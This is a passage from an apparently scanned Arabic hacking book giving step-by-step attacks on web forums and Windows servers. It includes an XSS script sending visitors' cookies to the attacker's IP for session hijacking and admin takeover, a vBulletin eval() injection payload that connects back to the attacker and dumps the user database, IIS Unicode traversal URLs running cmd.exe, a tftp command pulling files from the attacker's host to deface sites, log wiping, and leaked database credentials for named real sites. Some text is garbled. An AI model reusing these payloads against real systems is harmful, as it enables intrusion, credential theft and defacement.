تنقسم طريقة العمل الى عدة اقسام .. أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل المنتدى يستقبل

..HTMLبيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ

) .. ثم اكتب اي موضوع والصق بين السطورHTMLقم بكتابة موضوع جديد او رد (في منتدى يدعم الـ هذا الكود :

>script>document.write('<img src="http://my_ip_address/'+document.cookie+'">';</script<

الخاص بك .IP الى رقم الـ IP Adressمع ملحظة تغير الـ

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في جهاز وقراءة جزء

من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم

Apache او IISالي بي الذي قمنا بكتابته سابقا (مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل او غيرها ) .

300

Page 301: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الخاص بالسيرفر الذي يحتويه جهازك ..Logوبعد ان تتم العملية بنجاح قم بفتح ملف الـ .Acces Log واختر logs واختر Apcheمثال لو كان السيرفر اباتشي .. فتاح المجلد

ستجد جميع الوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20=[1012444064;%20bblastvi sit=1011983161

فكر قليل الن .. اين الباسورد ؟؟ الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟

قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكلhttp://www.victim.com/vb/index.php?

bbuserid=[userid]&bbpassword=[password hash[ ستجد عبارة : " أهل بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "

في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) .. لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد اللكتروني الى

بريدك الخاص .. وعندها تستطيع استقبال بريدForgot Passwordوثم قم بتسجيل الخروج .. ثم اذهب الى اداة

يحتوي باسورد الدمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------ الحل

-----------

في (المنتدى + الرسائل الخاصة + التواقيع + التقويمHTMLللحماية من هذه الثغرة قم باغلق الـ ( ... +

باي صورة كانت )HTML(واي منفذ يمكن من خلله وضع كود

>img> فاذا وضعت <script .. لنه ببساطة بامكانك استخدامه بدل كلمة <IMGكما يجب اغل كود الـ > اوDemonاو <

اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .Be Secret .. Dont' be Lamer.

2002 - 1 - 31تاريخ اكتشاف الثغرة : وهي تعمل بنجاح .2.2.0تم تجربتها على الصدار

انتهى،،،

301

Page 302: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها""

<ةةةةة ةة ةةةةة ةةةةة>ةةةةةة: ةةةةةة ةةةةةة><

نقاط7الدرس يتكون من المنتديات وانواعه1طريقة اختراقه2SQL أختراق الــــ 3سرفرات الويندوز ودوره في اختراق المنتديات4 النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم5% لاجهزتكم ومنتدياتكم80الحمايه من المخترقين بنسبة 6 المجله بجميع نسخه قابل لالختراق7

الدروس جميعها بالصورة وحقائق ودلئل

%100قمت بتجميع الدروس والضافتة عليه وتعديله

ارجو عدم نقل الدروس وكوبي

****************

المنتديات وانواعه 1

بجميع اصداراتهPowered by: vBulletinالمنتديات اول منتديات جون

لماذا لم يخترق احدي منتداهم حتي الن1اليوجد لهم مليون عدو2% في السرفر60 اليخترقون عشرات المنتديات يوميا ولماذا ليس منتدي جون وحمايته تصل الي 3

تفضل هذا ثغرات بموقعهم اشوي شغل كمان تصل لقلبهم لاريد التطويل الن بس مثال لمن يفهمهhttp://www.vbulletin.org/index.php?

topic=<script>alert(document.cookie)</script <

302

Page 303: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

2http://www.vbulletin.org/index.php?|

=forum/view.php&topic=../../../../../../../etc/passwd

********************

طريقة اختراقه

جميع الصدارات بتذكرو يمكن بعضكم113فلنبدي من صفر نسخة

كلنا نعرف منتديات الفي بي ، وهذا النوع من المنتديات يحب يركبه قليلين الخبره في أغلب الحيان ، وهذاالمنتدى هو المعروف عندنا العرب بكثره

Jouko Pynnonenالول اللي كتبته الفرنسي (على ما أعتقد)

vBulletin (http://www.vbulletin.com/) is a commonly used web forum system written in PHP. One of its key features is use of templates ,

which allow the board administrator to dynamically modify the look of the board .

vBulletin templates are parsed with the eval() function. This could be somewhat safe as long as the parameters to eval() are under strict

control. Unfortunately this is where vBulletin fails. With an URL crafted in a certain way, a remote user may control the eval() parameters

and inject arbitrary PHP code to be executed .

A remote user may thus execute any PHP code and programs as the web

server user, typically "nobody", start an interactive shell and try to elevate their privilege. The configuration files are accessible for the web server so the user can in any case access the MySQL database

containing the forums and user information .

According to the authors the vulnerability exist in all versions of vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer

overrun or other platform-dependant issues, so it's presumably exploitable under any OS or platform .

DETAILS =======

vBulletin templates are implemented in the following way: the gettemplate() function in global.php is used to fetch a template from database. The code is then passed to eval(). If we take index.php for

an example, there's this code :

303

Page 304: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

if ($action=="faq } ("eval("echo dovars(\"".gettemplate("faq ;(";("\".("

{

The dovars() function does some variable replacing, such as replace >largefont> with <font size="10 .<"

The gettemplate() function is defined in global.php :

function gettemplate($templatename,$escape=1 } ( //gets a template from the db or from the local cache

global $templatecache,$DB_site ;

if ($templatecache[$templatename } (""=![$template=$templatecache[$templatename ;[ {else } $gettemp=$DB_site->query_first("SELECT template FROM template

WHERE title='". addslashes($templatename ;("'".($template=$gettemp[template ;[$templatecache[$templatename]=$template ; {

if ($escape==1 } ($template=str_replace("\"","\\\"",$template ;( {

return $template ; {

For effectiveness the function implements a simple cache for template strings. After fetching them from the database they're stored in the

templatecache[] array. This array is checked for the template before doing the SQL query. Unfortunately the array is never initialized, so

a user can pass array contents in the URL, e.g .)for simplicity not %-escaped (

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page with the words "hello world ."

The eval() call above will execute

echo dovars("hello world ;("

304

Page 305: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

As if this wouldn't be bad enough, a remote user may as well pass a value containing quotation marks and other symbols. Quotation marks

aren't always escaped as seen in the code above, in which case index.php could end up executing code like

echo dovars("hello"world ;("

This would produce a PHP error message due to unbalanced quotes. It doesn't take a rocket scientist to figure out how a remote user could

execute arbitrary code from here, so further details about exploitation aren't necessary. If your vBulletin board produces an error message with an URL like the one above prefixed with a single quotation mark ,

it's definitely vulnerable .

The above example works with the "Lite" version. The commercial versions

are vulnerable too, but details may differ. After a little experimenting on the Jelsoft's test site I found some of the commercial versions also

have an eval() problem with URL redirecting, e.g .

http://www.site.url/member.php?acti...ypass&url=hello"world

and a similar one in the Lite version :

http://www.site.url/search.php?acti...s&templatecache[standardredirect]=hello"world

تنفذ في السيرفر ،urlتعرفون الكلم هذا ول داعي لترجمه ، من الكلم هذا أنت ممكن ترسل أكواد خلف الغبيه ، جرب مثل : hello+worldتضعها بدل الكلمه

vb 113 or 115- ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه 1 عندك في جهازك (طريقه فتح البورت تكون على مجازك) 90- أفتح البورت 2 هذا الى السيرفر url- أرسل الـ 3

search.php3?action=simplesearch&query=searchthis&templatecache[standardredirec

t]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),

%26%24errno,%26%24errstr,substr("900" ,0,3));if(!%24fp){}else{%24arr[200];fputs(%24fp,su

bstr("vhak1.0,%20- d%20downloads%20database,or%20press%20return%20for

%20command%20line" ,0,63));%24va=fgets(%24fp,3);fputs(%24fp,%24va);if

305

Page 306: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

)strlen(%24va)>1){include(substr("admin/config.php",0,16));include(substr("admin/config.php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24servername)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%24dbpassword" ,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu

ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20*%20from%20user" ,0,18));while(%24res=mysql_fetch_array

%20(%24curre

nta)){fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fp

uts(%24fp,"%24res[password],");fputs(%24fp,"%24res %24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),

%24arr);for(%24ir=substr("0",0,1);%24ir< sizeof(%24arr);%24ir%2B%2B){fputs(%24fp,%24arr[%24

ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak_

finished_execution);echo%28 "

By Kill -9

وهذا تغيرها على12 هذه تحط مكانها رقم الي بي حقك ، ثم الحظ بعدها وجود الرقم IP.IP.IP.IPلحظ 9 يكون طوله 127.0.0.1طول رقم الي بي ، مثل

ممكن أنت تخترع كود ثاني وترسله وتلحظ أنه يتنفذ ، ممكن ترسل كود يسجل لك أدمين ، هذا مثل ما صار وc4arab.com (أصدقائي طبعا) من باب التنبيه ، وكمان صار في arabteam2000.comفي

طريق السلم و الثقافه ...وكثير من المنتديات ، بهدف التحذير وليس التخريب ، وواضح أنه عمل بسيطيحتاج لشويه من التفكير ، أعتقد أهليز زمان صار فيه ، ولكن مسحت الداتالبيس وهذا سهل للغايه

طريقه قديمه نوعا ما ، وحطيتها للي حب يجرب فقط !!

وأعذروني على الملء والنحو

أرسل 90ملحظه أخيره : وهي عند ما تشبك مع السيرفر عن طريق البورت -d downloads

2.2xتنزل لك الداتبيس كلها ، وللسف طلعت غير مشفره وهذا يدل على التخلف ، ولكن في الصداره شفرت ولكن كسرتها وقريبا أقول لك عنها

11 الي 113تم شرح طريقة الختراق من

225 الي 115طريقة اختراق من

(تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) . WebServerالمتطلبات :

306

Page 307: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

المستوى : متوسط

فقط !! يمكن ان تجربها على انواع اخرى من المنتديات . vBulletinملحظة : هذه الطريقة لست للـ

----------الثغرة :

---------

تنقسم طريقة العمل الى عدة اقسام .. أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعلالمنتدى يستقبل

.. HTMLبيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ

) .. ثم اكتب اي موضوع والصق بين السطورHTMLقم بكتابة موضوع جديد او رد (في منتدى يدعم الـ هذا الكود :

>script>document.write('<img src="http://my_ip_address/'+document.cookie+'">';</script <

الخاص بك . IP الى رقم الـ IP Adressمع ملحظة تغير الـ

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر فيجهاز وقراءة جزء

من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطورالى رقم

Apache او IISالي بي الذي قمنا بكتابته سابقا (مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل او غيرها ) .

الخاص بالسيرفر الذي يحتويه جهازك .. Logوبعد ان تتم العملية بنجاح قم بفتح ملف الـ . Acces Log واختر logs واختر Apcheمثال لو كان السيرفر اباتشي .. فتاح المجلد

ستجد جميع الوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20=[1012444064;%20bblastvi sit=1011983161

فكر قليل الن .. اين الباسورد ؟؟ الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟

قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل http://www.victim.com/vb/index.php?

bbuserid=[userid]&bbpassword=[password hash [

307

Page 308: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ستجد عبارة : " أهل بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) " في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..

لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد اللكتروني الىبريدك الخاص

.. وعندها تستطيع استقبال بريدForgot Passwordوثم قم بتسجيل الخروج .. ثم اذهب الى اداة يحتوي باسورد الدمن ..

*******************

SQL أختراق الــــ 3

يمكنك استخدام برنامج العقرب بيكون اسرع لمن لديه نسخ منه

)؟؟ SQLس :في البداية ماهي الس كيو ال (

الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية بASP هي صفحات تسحب بياناتها

وهذاSQL ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ASP وصفحات SQLمن قاعدة SQLماسوف اشير اليه لحقا ، و

1433تتنصت على البورت قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي علىSQLايضا مااريد ان اخبرك به ان ال

عدد من الجداول يمكن والعدد الكبير من البيانات التى تحتويها . SQLان تتصور كبرقواعد بيانات

؟ SQLس : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات في الغالبASP بل منتديات PHPهذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات

سوف تحصل على جميع اسماء المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ، اما اذا كان

الموقع يحتوي على ميزة قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ، عندها قم بانشاء شركة للدعاية والعلن

_ LinuxRayوسوف تصبح ثريا اذن لتنسى توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميلد ،

. Administratorممكن ان تصبح

اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ...

؟ SQLس : مالذي تحتاجة للدخول على قواعد بيانات

Passwd و User Nameتحتاج فقط لل

س : من اين احصل على اسم المستخدم وكلمة المرور ؟

ASP منها كما اسلف صفحات ال User name and Passwdهناك طرق عديدة للحصول على هناك ثغرات كثير يمكن sqlوملفات اخرى من نوع *.

htrان تحصل منها على كلمات المرور مثل ثغرة +.كيف تستخدم هذه الثغرة :

308

Page 309: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://target/page.asp+.htr target الموقع الهدف : Page صفحة : asp

.+htr الثغرة :

هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدةاذن منها الفائدة هو

التىASP لكي ترى اوامر البرمجة الخاصة ب View Sourceخلف هذه الصفحة البيضاء اذهب الى ليمكن لك ان تراها في الوضع العادي : مثل

%>

Set DB= Server.CreateObject("ADODB.Connection ("DB.Open "DRIVER=SQL

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666 "

<% ------------------------------------------------------------------

LinuxRayفي الكود السابق ترى ان اسم المستخدم هو _ 6666666وكلمة السر هي

------------------------------------------------------------------

مثل التي : ASPالشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال

AMicrosoft VBScript runtime error '800a01a8 '

Object required: 'Conn '

/filename.inc, line 5

هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسمincهناك ملف ينتهي بامتداد *.المستخدم وكلمة المرور

اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .

ASPوممكن ان ترى مثل هذا المر في صفحة database.incعند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف

#--!>include file = "database.inc <--"

وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات

global.asa

309

Page 310: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

++global.asa beforemilion-global.asa

-global.asa milion.sql

global-direct.asa

SQLليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين

وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي :

global.asa+.htr

كما يلي data هذا الرمز ::$ASP وهي ان تضيف بعد صفحة IIS 3هناك ثغرة قديمة في file.asp::$data

فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر . IIS 3هذه الثغرة لتعمل ال على

لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟

!! SQLبعدها الدخول على قاعدة ال

لكني مازلت افضلVisual interdev 6.0هناك عدة برامج تدخل على قاعدة البينات انا استخدم ACCESS 2000استخدام البرنامج السهل

كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة File اختر

New ومن قائمة الملفات الجديدة اختار

Project (Exiting Data (اي مشروع قاعدة بيانات موجودة . سيظهر لك مربع لنشاء الملف اختر

Create اي انشاء

الن سترى مربع Data Link Properties

تحتاج فقط لثلث معلومات اسم الموقع او الي بي - اسم المستخدم - كلمة المرور

Select or enter server name - ادخل اسم الموقع في صندوق 1

User Name - اسم المستخدم في 2

Password - كلمة السر 3

) Blank Passwordملحظة ( قم بإزالة الصح من مربع

310

Page 311: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذهTest Connectionاضغط في البداية على Test Connection Succeededالعبارة

فمعناه ان التصال بقاعدة البيانات تم بنجاح. يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :

Select the data base on the server او موافق . OKواضغط على

فئران التجارب : /http://www.moe.gov.saموقع

- قم بالدخول على الصفحة التالية : 1

http://www.moe.gov.sa/news_admin.asp

سترى مايلي

Microsoft VBScript runtime error '800a01a8 '

Object required: 'Conn '

/news_admin.asp, line 7

كتالي : htrثم طبق عليها ثغرة

http://www.moe.gov.sa/news_admin.asp+.htr

اذهب الى السورس لترى

#--!>include file = "database.inc <--"

كتالي : database.incقم بسحب ملف

http://www.moe.gov.sa/database.inc

سوف ترى مايلي :

%>

Set DB= Server.CreateObject("ADODB.Connection ("DB.Open "DRIVER=SQL

Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321 "

<%

هل تعرف مالذي امام عينك الن انه اسم المستخدم وكلمة المرور ..... سارع بالتشبيك على قاعدة البياناتانا اعرف ان ل احد يحب مادة

الكيمياء .

311

Page 312: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

فأر التجارب الثاني :

/http://www.itsalat.comموقع

1 - User name : sa Passwd : sp2000

*****************سرفرات الويندوز ودوره في اختراق المنتديات

نحن الهكرز واي هكرز مبتدي يعرف ثغرات الويندوز جيدا دا% وثغراته بالالوف80وهي نظام فاشل

ولانصح اي اخ لديه منتدي وموقع يستضيف سرفرات ويندوز راح اقلكم ليش بااثبتات

ميك ويحتوي علي15000 كيك يعني 1.5 هو صورة لجمعية امريكي مهم وحجم قاعدات البيانات 2صورخمسة ملين مشترك تم اختراقه البارحه بنفسي جاري تحميل الموقع لجاهزي كامل

ثغرات الهتمل1الفرونت بيج2مخلفات الفتبي والستفاد منه كثير لهكرز3ثغرات البرامج4%100 عدم تمكن حماية النظام 6

لذلك انصح الخوه بالبتعاد عن سرفرات الويندوز وبرامجهم

IIS بداية نعرف ماهي

الـ IISهي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي

IIS5.0 وويندوز الفين يمتلك الصدارة الخامسة من ملقم معلومات النترنت...

بسم ال نبدأ وهذه النقطة تستغل بطريقة سهلة جدا 5 او 4توجد نقطة ضعف في الي اي اس

وتسمى هذه النقطة باليونيكود وتنفيذها سهل ليحتاج الى خبرة عميقة في مجال اختراق المواقع

ولكن نقف عند هذه النقطة للمبتئيدئن المبتدئين عامة يفكرون الن في اختراق عدة مواقع شهيرة بهذه الطريقة

ولكن ل هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة لن نقطة الضعف هذه لتوجد ال في ويندوز الفين او ان تي

وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة

لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الضعاف الموجودة في الن تي لكن بتلك الطريقة قد يكونون جعلو حاجزا لهم من الهكرة

312

Page 313: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ولكن ليس دائما وتنفذ من داخل المتصفح

وطريقة تنفيذ الثغرة كالتي : http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c \:

ركزو هنا الن بعد دوت كوم بدأت تنفيذ الثغرة :هذه الثغرة تسمح لك بــ عرض جميع ملفات cوبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي

وتوجد أكثر من ثغرة وهي /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c \:/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c \:/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c \:/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\

%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c \:وطريقة تنفيذها من المتصفح

ومكان تنفيذها بعد اسم الموقع مثال :

http://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c+\ أي بعد دوت كوم

بعض الناس يسألون مالذي يظهر او على اي شكل يظهر الحل بسيط

Dir هذا المر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات وطريقة ظهور الملفات في المتصفح تقريبا

بنفس طريقة الدوس إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية

الخطوة الثانية عمل ابلود للملف الذي تريد تحميله وعمل البلود أيضا ليحتاج الى خبرة

لكن هنالك شروط لكي تعمل ابلود يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية

وللكي تتأكد إتبع التي ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في32يجب الدخول على ملف السستم

تنفيذها مثال:

http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c \:هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات

لحظ التغير http://www.xxxxxx.com/scripts/..Á

../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32 \\ Winnt\Sytem32ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز

أي يجب عليك الدخول على هذه الملفات لكي تتأكد بعض القراء يتسالون ..... الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط

للتطابقها يجب عليك الدخول باي كان على مللف السستم

313

Page 314: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ممكن يكون احد القراء اشتغلت معاه هذه الثغرة http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c\:

ويقول كيف ادخل على ملف السستم 32الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم

اي بعد هذا المتداد c+dir+c هنا تضيف أسماء الملفات\:

http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32/ كما قلنا سابقا لتحتاج الى خبرة

وبعد دخول ملف السستم ستظهر لك محتوياته ويجب على آنذاك البحث عن برنامج يسمي

tftp.exe يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز لن هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة

ولو لقيت البرنامج اتفاءل بالخير يعني بإذن ال تعبك ماهو رايح على الفاضي .........................................................................................

والشرط الثاني هو يجب أن يكون عندك برنامج التي إف تي بي

وهذا البرنامج تقدر تنزله من هذا العنوان www.geocities.com/anorR1234/tftpd32.zip

C وبعد ماتنزل البرنامج وتفك الضغط منه من الفضل إنك تحطه داخل الـ\:وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي

تحطه في السي الى داخل جهازك مو الى دالخل الموقع وتشغل البرنامج

tftp32.exe وتتركه يعمل الى أن تنتهى من مهمتك الساسية C أسمع كلمي وحط كل شي في\:

لنك لو حطيتها بإذن ال راح تنجح المهمه -----------------------------------------------------------------

الن بدأنا في النقطة الخطرة وهي تحميل الملفات مع العلم أني اقصد بالتحميل البلود

أي أبلود = تحميل

مو تجميل وتحميل الملفات طريقة معقدة نسبيا بس أنا متفائل بالخير لني معتقد أنكم راح تفهمو

المهم نرجع لموضوعنا المهم طريقة نسخ الملفات تضاف ايضا الى المتصفح

وتضاف بهذه الطريقة مثال :

http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c\: تخيل الثغرة هذه اشتغلت معاك

ويجب عليك إنك تمسح بعض الضافات من الثغرة لكي تضيف امر النسخ /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

يعني الى راح نمسحه من الثغرة بيكون هذه الضافة /c+dir+c \:

عشان تظيف بدالها /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-

i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm شايفين ياشباب إش الى اتغير

بس لزم أيضا إنك تغير اللزم في أمر النسخ مثل

314

Page 315: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

tftp.exe هذا سيبه في حاله لنه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الن -"i هذا برضه سيبه لنه مهم "

هنا بدال الرقام هذا تكتب اليبي تبع جهازك وعشان تتأكد من اليبي لمن تشغب التي اف تي بي1.1.1.1راح يطلع ايبي وهذا اليبي الى طلعلك هو الى تكتبه

GET هذه الضافة سيبها في حالها لنها تعتبر شرط في نسخ المفات index.htm هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت

C:\inetpub\wwwroot وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع \index.htm هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع

C يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ\:index.htm ومثل اسم الصفحة

قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الن صارت مشابها لمثل هذه الثغرة http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-

i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm ولو طلعت مشابها لها اضغط إنتر وتوكل على ال

وبإذن ال راح يتنسخ الملف -------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------وفى النقطة الخيرة والهم

مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل اليبي http://server/msadc/..À¯../..../c+del+c:/*.log

--------------------------------------

*******************

النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم 5

لنه يستخدم نسخه نضيفه1اول كما قلنا لماذا ليخترقوا منتديات جون رغم ثغرات موقعه

النسخه الموجود بالنت مليان ثغرات وعارفين جيد مصمممي المنتدي لماذا ينشرونه اذا1$ النسخه تجريبي ومحتوي كود التبليغ لكي لو نفذت ومسحت كود التبليغ لن تهرب من ثغراته لو تشغل فكرك

لكشفته بنفسك

يوما فهمتموني30 انه جميعه نسخه تجريبي لترويج بضعتهم بدل ان تكون لمدة 2

النسخه المنتشره بالنترنت هو نسخه نحصل علي من مواقع هكرز صح وينك انت من هكرز الغرب3وحيلهم

% ونسخه منتشره في النت لرئيت صح قاموا بحذف كود100لو تمكنت في الحصول علي نسخة الشركة التبليغ منه بل اضافوا اليه كوداد وبلوي وثغرات-وبعدين يجي الخ صاحب النسخه يوكد انه لقي ثغرة

بمنتديات جونوالعالم يندهش كييييييف خلص انشهر موقعه وسعر اعلناته ارتفع في موقعه لكثر الزوار

الحقيقة هو نفسه اضاف الكود ونفسه يعرف مكانه وكيفة العب فيه وال هكذا المور

315

Page 316: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

المعربين العرب ليسوا اقل نذل من الجانب

انصحكم بتعريب نسخكم باانفسكم

